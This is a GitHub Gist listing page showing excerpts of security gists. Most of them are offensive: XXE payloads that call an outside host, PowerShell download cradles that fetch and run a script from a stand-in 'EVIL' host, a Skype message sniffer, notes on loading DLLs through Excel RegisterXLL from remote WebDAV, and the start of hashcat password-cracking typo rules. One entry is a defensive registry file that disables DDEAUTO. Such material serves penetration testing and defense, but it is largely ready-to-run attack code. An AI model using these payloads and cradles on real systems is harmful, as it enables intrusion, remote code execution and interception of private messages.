Skip to content

Instantly share code, notes, and snippets.

View NoobieDog's full-sized avatar

NoobieDog NoobieDog

77 followers · 70 following
View GitHub Profile
@staaldraad
staaldraad / XXE_payloads
Last active June 15, 2024 16:32
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@HarmJ0y
HarmJ0y / DownloadCradles.ps1
Last active July 18, 2024 03:59
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
@PaulSec
PaulSec / skype_sniffer.py
Created October 29, 2015 11:48
Simple Skype Sniffer
import Skype4Py
def Commands(message, status):
if status == 'SENT' or (status == 'RECEIVED'):
print message.Body
skype = Skype4Py.Skype()
skype.OnMessageStatus = Commands
skype.Attach()
while True:
@ryhanson
ryhanson / ExcelXLL.md
Last active July 22, 2024 15:25
Execute a DLL via .xll files and the Excel.Application object's RegisterXLL() method

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN

The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc

@wdormann
wdormann / disable_ddeauto.reg
Last active May 8, 2024 07:50
Disable DDEAUTO for Outlook, Word, OneNote, and Excel versions 2010, 2013, 2016
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options]
"DontUpdateLinks"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Options]
"DontUpdateLinks"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options]
"DontUpdateLinks"=dword:00000001
@roycewilliams
roycewilliams / hashcat-kwprocessor-typo-rules.txt
Last active October 25, 2023 19:27
hashcat-kwprocessor-typo-rules.txt
--------------------------------------------------------------------------------
# Crude generation of typo rules
# (Using kwprocessor (https://github.com/hashcat/kwprocessor) and hashcat)
#
# Useful for passwords that don't require confirmation (like some cryptocurrency
# wallets, password-protected archive files, etc.)
#
# May also be useful for stacking with other rules.
#
# This approach assumes that you are making the same typo every time